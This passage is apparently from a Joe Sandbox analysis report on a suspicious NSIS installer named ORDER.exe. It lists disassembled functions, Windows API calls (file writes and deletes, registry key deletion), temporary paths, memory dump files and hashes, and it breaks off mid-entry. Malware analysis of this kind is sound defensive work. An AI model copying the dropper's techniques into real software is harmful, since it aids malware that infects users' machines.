                          • Instruction Fuzzy Hash: 75319CB1504251EFF722CF94CCC4C6B7BBDEB852D4B128569FA4193228DB31AC54DB62
                          APIs
                            • Part of subcall function 004059C7: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ORDER.exe,80000000,00000003), ref: 004059CB
                            • Part of subcall function 004059C7: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059ED
                          • GlobalAlloc.KERNEL32(?,?), ref: 004026D7
                          • CloseHandle.KERNEL32(?), ref: 0040275D
                            • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004026F3
                          • GlobalFree.KERNEL32(?), ref: 0040272C
                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040273E
                          • GlobalFree.KERNEL32(00000000), ref: 00402745
                            • Part of subcall function 00402F1F: SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                            • Part of subcall function 00402F1F: WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,?,00000004,00000000,00000000,?,?), ref: 00402FD2
                          • DeleteFileA.KERNEL32(?), ref: 00402771
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                          • String ID:
                          • API String ID: 64603807-0
                          • Opcode ID: 886bff04a04abf0191cccc6423df3f8a629c61cd78b255a0e1cb1f67b1668c44
                          • Instruction ID: 6bd6e99ca2686c51998a376200e97ca61e834f49c4b1b8850f9bef3558c81133
                          • Opcode Fuzzy Hash: 886bff04a04abf0191cccc6423df3f8a629c61cd78b255a0e1cb1f67b1668c44
                          • Instruction Fuzzy Hash: 49218CB1C00118BFCF116FA4CD88CAEBE79EF08364B10423AF520772E0C6795D419BA8
                          APIs
                          • DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
                          • GetTickCount.KERNEL32 ref: 00402C10
                          • wsprintfA.USER32 ref: 00402C3E
                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                            • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                            • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll), ref: 0040508D
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                          • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                          • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                            • Part of subcall function 00402BBE: MulDiv.KERNEL32(00041C71,?,00043A73), ref: 00402BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                          • String ID: ... %d%%
                          • API String ID: 722711167-2449383134
                          • Opcode ID: 4774796197fe5164bdbc165248605a4c2f395ef1972e6126fe3027443e66bd13
                          • Instruction ID: 53b2eec8c243fd5a5b591a6d8e7090b5e500d3da6e0592f5c5af2241ed808ea0
                          • Opcode Fuzzy Hash: 4774796197fe5164bdbc165248605a4c2f395ef1972e6126fe3027443e66bd13
                          • Instruction Fuzzy Hash: AB0188B0949614ABDB216F64AE4DE9F7B7CFB017057148037FA01B11E1C6B8D541CBAE
                          APIs
                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404905
                          • GetMessagePos.USER32 ref: 0040490D
                          • ScreenToClient.USER32(?,?), ref: 00404927
                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404939
                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040495F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                          • Instruction ID: 7baaa9b85802c8a5173365c44ed2834cc31749f5d024e9fb4d2ec5e64c2f69ce
                          • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                          • Instruction Fuzzy Hash: E40140B1D00218BADB01DBA4DC85FFFBBBCAB95721F10412BBA10B61D0C7B469018BA5
                          APIs
                          • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B5D
                          • wsprintfA.USER32 ref: 00402B91
                          • SetWindowTextA.USER32(?,?), ref: 00402BA1
                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                          • API String ID: 1451636040-1158693248
                          • Opcode ID: bccffcf18056edd42c20cb723d80919439a72dcdb3cc8cc3de12e394d3f134cc
                          • Instruction ID: 4b4d840d1cf11f9656568dd8641bec75cd76f4f3bd4f461a87d93eb2d0bf3f96
                          • Opcode Fuzzy Hash: bccffcf18056edd42c20cb723d80919439a72dcdb3cc8cc3de12e394d3f134cc
                          • Instruction Fuzzy Hash: F7F01D70900208BBEF215F61DD4ABEE3779EB00345F00803AFA06B51D0D7F8AA558B9A
                          APIs
                          • lstrlenA.KERNEL32(Stvkonsekvenserne115 Setup: Installing,Stvkonsekvenserne115 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,004046FB,000000DF,00000000,00000400,?), ref: 0040487E
                          • wsprintfA.USER32 ref: 00404886
                          • SetDlgItemTextA.USER32(?,Stvkonsekvenserne115 Setup: Installing), ref: 00404899
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s$Stvkonsekvenserne115 Setup: Installing
                          • API String ID: 3540041739-1393985702
                          • Opcode ID: 878f77dbdcb51275c09da16e61d4023f379ce68319930481f66ff31823ee0149
                          • Instruction ID: 8631c14a921e8479d2aaee063571767324bc63c1cfe9171b6f21c1c007081b9c
                          • Opcode Fuzzy Hash: 878f77dbdcb51275c09da16e61d4023f379ce68319930481f66ff31823ee0149
                          • Instruction Fuzzy Hash: 90112433A441283BDB0065AD9C49EAF328CDF81334F244637FA25F61D1E9788C1292E8
                          APIs
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                          • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                          • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Close$DeleteEnumOpen
                          • String ID:
                          • API String ID: 1912718029-0
                          • Opcode ID: 5733a3c7ed8837a4e33d89bc0436a18c4a21248f1d51b77dead4e3ad8d80db37
                          • Instruction ID: 1cfc72d501241f28ff1c9237e437913a5e8660848d06dce24e2e83bd327c9a1b
                          • Opcode Fuzzy Hash: 5733a3c7ed8837a4e33d89bc0436a18c4a21248f1d51b77dead4e3ad8d80db37
                          • Instruction Fuzzy Hash: EA114F71A00108FFDF219F90DE48EAA3B7DEB44349B104076FA05B11A0DBB49E559F69
                          APIs
                          • GetDlgItem.USER32(?), ref: 00401CD0
                          • GetClientRect.USER32(00000000,?), ref: 00401CDD
                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                          • DeleteObject.GDI32(00000000), ref: 00401D1B
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: feff7bd0ac8b8d98e410c971607266924d1cc5c353d4854e70ab97e8d29ee8d5
                          • Instruction ID: 68903ef9478fc0d920f95a79cd5396482650d24808bb52901199de5d2149753e
                          • Opcode Fuzzy Hash: feff7bd0ac8b8d98e410c971607266924d1cc5c353d4854e70ab97e8d29ee8d5
                          • Instruction Fuzzy Hash: 06F062B2A05114BFD701DBA4EE88CAF77BCEB44301B008576F501F2091C7389D019B79
                          APIs
                          • GetDC.USER32(?), ref: 00401D29
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                          • ReleaseDC.USER32(?,00000000), ref: 00401D56
                          • CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirectRelease
                          • String ID:
                          • API String ID: 3808545654-0
                          • Opcode ID: 7af4cf4b66e980d364c2e3aa9c64882f60449cc7f52f10eab55021efc1d5f786
                          • Instruction ID: b452d76144ce78c1ea2c31cbd89393ff29a213aa8dcca448cc35c7c7cb6754f7
                          • Opcode Fuzzy Hash: 7af4cf4b66e980d364c2e3aa9c64882f60449cc7f52f10eab55021efc1d5f786
                          • Instruction Fuzzy Hash: F8011271948340AFE701DBB0AE0EB9A7F74EB19705F108535F141B72E2C6B954159B2F
                          APIs
                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                          • Instruction ID: c8505a4ed1fbcfe48898eca751f608fe424cacc25c72cee6cab93c7adb8e4515
                          • Opcode Fuzzy Hash: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                          • Instruction Fuzzy Hash: 742190B1A44208BFEF41AFB4CD4AAAE7BB5EF40344F14453EF541B61D1D6B89A40E728
                          APIs
                          • SetWindowTextA.USER32(00000000,00422F00), ref: 00403AE4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: TextWindow
                          • String ID: "C:\Users\user\Desktop\ORDER.exe"$1033$Stvkonsekvenserne115 Setup: Installing
                          • API String ID: 530164218-3959753696
                          • Opcode ID: c20953c35db1116ecdf277b9f7b3923fed37fef6e8e5c3a171d6f7dc7f85f207
                          • Instruction ID: 694a286dd4981efc18ef326c294584d4bec2a1602357d8abc11fec8a6f834ca0
                          • Opcode Fuzzy Hash: c20953c35db1116ecdf277b9f7b3923fed37fef6e8e5c3a171d6f7dc7f85f207
                          • Instruction Fuzzy Hash: EC11D4B1B046109BCB24DF15DC809337BBDEB8471A329813BE941A73A1C73D9E029A98
                          APIs
                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 004057CC
                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 004057D5
                          • lstrcatA.KERNEL32(?,00409014), ref: 004057E6
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-3355392842
                          • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                          • Instruction ID: c144259923a6e848a034fe90771ae4f3275bad2fdba58d127270a3e6eafdfb33
                          • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                          • Instruction Fuzzy Hash: 00D0A962606A306BD20222168C09E8F6A08CF06300B044033F204B62B2C63C0D418FFE
                          APIs
                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                          • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F09
                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                          • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                            • Part of subcall function 00405C94: wsprintfA.USER32 ref: 00405CA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                          • String ID:
                          • API String ID: 1404258612-0
                          • Opcode ID: ec7151e13ff031cd6146c14c1100c40685b360c9b493fb258c96d19e35a9089b
                          • Instruction ID: 9791f4c70c1528f8983e13c97e2cb0ced061aec02aec85b9ff59acd402aedfa8
                          • Opcode Fuzzy Hash: ec7151e13ff031cd6146c14c1100c40685b360c9b493fb258c96d19e35a9089b
                          • Instruction Fuzzy Hash: A0117071901209BEDF01EFA5DD85DAEBBB9EF04344B20807AF505F61A1D7388E55DB28
                          APIs
                          • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,?,004058CB,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,?,?,77232EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77232EE0,00000000), ref: 0040586D
                          • CharNextA.USER32(00000000), ref: 00405872
                          • CharNextA.USER32(00000000), ref: 00405886
                          Strings
                          • C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp, xrefs: 00405860
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CharNext
                          • String ID: C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp
                          • API String ID: 3213498283-1753671414
                          • Opcode ID: 2ea991d7d7ffd85479a521eab3fc1e567f9f9a9fdda000af801139d1d19966a1
                          • Instruction ID: 725a23b4e930c3b6c27a7d0cd0e333612dd42f6c53d199a680129a9385ae8045
                          • Opcode Fuzzy Hash: 2ea991d7d7ffd85479a521eab3fc1e567f9f9a9fdda000af801139d1d19966a1
                          • Instruction Fuzzy Hash: 74F06253914F516AFB3276645C44B7B5A8CCF56361F188477EE40A62C2C2BC4C618F9A
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00404FC2
                          • CallWindowProcA.USER32(?,?,?,?), ref: 00405013
                            • Part of subcall function 00404038: SendMessageA.USER32(00010474,00000000,00000000,00000000), ref: 0040404A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
